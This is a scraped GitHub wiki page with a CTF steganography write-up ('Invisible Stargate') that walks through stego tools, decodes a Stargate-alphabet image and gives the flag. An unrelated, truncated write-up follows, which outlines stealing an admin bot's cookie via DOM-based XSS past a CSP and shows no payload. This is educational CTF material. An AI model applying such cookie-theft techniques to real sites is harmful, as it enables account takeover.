vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> PatriotCTF : CoruptAAAAd</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/PatriotCTF-:-CoruptAAAAd/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> PicoCTF : Eavesdrop</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/PicoCTF-:-Eavesdrop/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> PicoCTF : Operation Oni</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/PicoCTF-:-Operation-Oni/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> PicoCTF : Sleuthkit Apprentice</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/PicoCTF-:-Sleuthkit-Apprentice/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> PicoCTF : st3g0</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/PicoCTF-:-st3g0/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> PicoCTF : Transposition Trial</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/PicoCTF-:-Transposition-Trial/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> Space Heroes CTF : Easy Crypto Challenge</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/Space-Heroes-CTF-:-Easy-Crypto-Challenge/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> Space Heroes CTF : Information Paradox</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/Space-Heroes-CTF-:-Information-Paradox/_toc"> </include-fragment></details> <details class="details-reset" open> <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron js-wiki-sidebar-toc-toggle-chevron-open mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> Space Heroes CTF : Invisible Stargate</span> </div> </summary> Description Solution Recon Execution Flag </details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> Space Heroes CTF : Off The Grid</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/Space-Heroes-CTF-:-Off-The-Grid/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> Space Heroes CTF : Strange Traffic</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/Space-Heroes-CTF-:-Strange-Traffic/_toc"> </include-fragment></details> </div></div> </div> <h5 class="mt-0 mb-2">Clone this wiki locally</h5> <div class="width-full input-group"> <input id="wiki-clone-url" type="text" data-autoselect class="form-control input-sm text-small color-fg-muted input-monospace" aria-label="Clone URL for this wiki" value="https://github.com/not1cyyy/CTF-Writeups.wiki.git" readonly> <span> <clipboard-copy for="wiki-clone-url" aria-label="Copy to clipboard" data-view-component="true" class="btn btn-sm zeroclipboard-button"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy"> <path d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 0 1 0 1.5h-1.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-1.5a.75.75 0 0 1 1.5 0v1.5A1.75 1.75 0 0 1 9.25 16h-7.5A1.75 1.75 0 0 1 0 14.25Z"></path><path d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0 1 14.25 11h-7.5A1.75 1.75 0 0 1 5 9.25Zm1.75-.25a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Z"></path></svg> <svg style="display: none;" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check color-fg-success"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg></clipboard-copy> </span> </div> </div></div> <div data-view-component="true" class="Layout-main"> <div id="wiki-body" class="gollum-markdown-content"> <div class="markdown-body"> <h1><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Description</h1>We're supplied with this image and asked to recover a flagHint : the challenge's name hints on where to start<h1><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Solution</h1><h2><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Recon</h2>"Invisible .." hmmmm.. this hints on something related to steganography !googling the word "stargate" we find a link to dcode.fr that has the title "Alphabet des Anciens de Stargate" which stands for "Stargate ancestors' alphabet" Aha! that explains why it's in the crypto category !<h2><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Execution</h2>Since it's most likely to be a steganography-related challenge I tried running multiple stego tools like binwalk and foremost but these latters give no output, steghide with no passphrase also gives no output.Okay things are getting interesting, Cat and Strings commands on Linux piped to a grep command give nothing other than random gibberish.Hmmmmm let's try Stegsolve! since the challenge title says "invisible" it's probably some sort of filter that needs to be applied, false hope.. nothing at all.There must be a tool that we don't know about so I tried googling "invisible steganography tools" and i stumbled across this tool called Digital Invisible Ink Toolkit.This must be it ! I went ahead to downloading it and I opened itThen heading to the decode section I was asked to supply an image and a passphrase, I uploaded the given image with no passphraseThen here's where stuff get complicated a bit, the default algorithm prompts me with an error so I kept trying until one that's called "Dynamicfilterfirst" worked !Awesome ! now the output file indicates using the file command that it's a jpeg image so I went ahead and renamed it to output.jpegand it gives us this weird image :Aha! I recognize these ! it's the stargate alphabet that i stumbled across when googling !using dcode.fr I was able to decrypt the message and voila !<h1><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Flag</h1>shctf{one_small_step_for_jaffa} We're supplied with this image and asked to recover a flag Hint : the challenge's name hints on where to start Since it's most likely to be a steganography-related challenge I tried running multiple stego tools like binwalk and foremost but these latters give no output, steghide with no passphrase also gives no output. Okay things are getting interesting, Cat and Strings commands on Linux piped to a grep command give nothing other than random gibberish. Hmmmmm let's try Stegsolve! since the challenge title says "invisible" it's probably some sort of filter that needs to be applied, false hope.. nothing at all. There must be a tool that we don't know about so I tried googling "invisible steganography tools" and i stumbled across this tool called Digital Invisible Ink Toolkit. This must be it ! I went ahead to downloading it and I opened it Then heading to the decode section I was asked to supply an image and a passphrase, I uploaded the given image with no passphrase Then here's where stuff get complicated a bit, the default algorithm prompts me with an error so I kept trying until one that's called "Dynamicfilterfirst" worked ! Awesome ! now the output file indicates using the file command that it's a jpeg image so I went ahead and renamed it to output.jpeg and it gives us this weird image : Aha! I recognize these ! it's the stargate alphabet that i stumbled across when googling ! using dcode.fr I was able to decrypt the message and voila ! shctf{one_small_step_for_jaffa} </div> </div></div></div> </div> </div> </div> </turbo-frame> </main> </div> </div> <footer class="footer width-full container-xl p-responsive" role="contentinfo"> <h2 class='sr-only'>Footer</h2> <div class="position-relative d-flex flex-items-center pb-2 f6 color-fg-muted border-top color-border-muted flex-column-reverse flex-lg-row flex-wrap flex-lg-nowrap mt-6 pt-6"> <div class="list-style-none d-flex flex-wrap col-0 col-lg-2 flex-justify-start flex-lg-justify-between mb-2 mb-lg-0"> <div class="mt-2 mt-lg-0 d-flex flex-items-center"> <svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg> <span> © 2023 GitHub, Inc. </span> </div> </div> <nav aria-label='footer' class="col-12 col-lg-8"> <h3 class='sr-only' id='sr-footer-heading'>Footer navigation</h3> Terms Privacy Security Status Docs Contact GitHub Pricing API Training Blog About </nav> </div> <div class="d-flex flex-justify-center pb-6"> <span></span> </div></footer> <div id="ajax-error-message" class="ajax-error-message flash flash-error" hidden> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <button type="button" class="flash-close js-ajax-error-dismiss" aria-label="Dismiss error"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> You can’t perform that action at this time. </div> <div class="js-stale-session-flash flash flash-warn flash-banner" hidden > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>You signed in with another tab or window. Reload to refresh your session.</span> <span>You signed out in another tab or window. Reload to refresh your session.</span> </div> <template id="site-details-dialog"> <details class="details-reset details-overlay details-overlay-dark lh-default color-fg-default hx_rsm" open> <summary role="button" aria-label="Close dialog"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast hx_rsm-dialog hx_rsm-modal"> <button class="Box-btn-octicon m-0 btn-octicon position-absolute right-0 top-0" type="button" aria-label="Close dialog" data-close-dialog> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div class="octocat-spinner my-6 js-details-dialog-spinner"></div> </details-dialog> </details></template> <div class="Popover js-hovercard-content position-absolute" style="display: none; outline: none;" tabindex="0"> <div class="Popover-message Popover-message--bottom-left Popover-message--large Box color-shadow-large" style="width:360px;"> </div></div> <template id="snippet-clipboard-copy-button"> <div class="zeroclipboard-container position-absolute right-0 top-0"> <clipboard-copy aria-label="Copy" class="ClipboardButton btn js-clipboard-copy m-2 p-0 tooltipped-no-delay" data-copy-feedback="Copied!" data-tooltip-direction="w"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon m-2"> <path d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 0 1 0 1.5h-1.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-1.5a.75.75 0 0 1 1.5 0v1.5A1.75 1.75 0 0 1 9.25 16h-7.5A1.75 1.75 0 0 1 0 14.25Z"></path><path d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0 1 14.25 11h-7.5A1.75 1.75 0 0 1 5 9.25Zm1.75-.25a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check js-clipboard-check-icon color-fg-success d-none m-2"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> </clipboard-copy> </div></template> </div> <div id="js-global-screen-reader-notice" class="sr-only" aria-live="polite" ></div> </body></html>
# umassdining Categories: Web Description:> I heard there are these weirdos who love UMASS dining a little bit too much. Can you infilitrate their secret society and get their super secret flag for me? ## Takeaways DOM-based XSS. Finally a use-case for double encoding. ## Solution In this challenge we are given the source code. As we can see from the source, we need to reach `/join` to get the flag, but that is only possible if we have the correct admin `auth` cookie. So, we somehow have to leak it. The app also has Content-Security-Policy (CSP) enabled, which is set to `"default-src 'self';script-src 'self' 'unsafe-eval'"`. So, it seems that somehow invoking an `eval` with attacker-controlled data should be our way to go here. There seems to be an admin bot. The user submits essays at the `/register` endpoint via POST requests, with the parameters `email` and `essay`. Then, the bot will visit the URL `/review/essay?email={email}&essay={essay}` which is only accessible from `127.0.0.1`. A first attempt to bypass the IP restriction was by using the `x-forwarded-for` and similar headers, but this didn't work. The next thing to note is how the 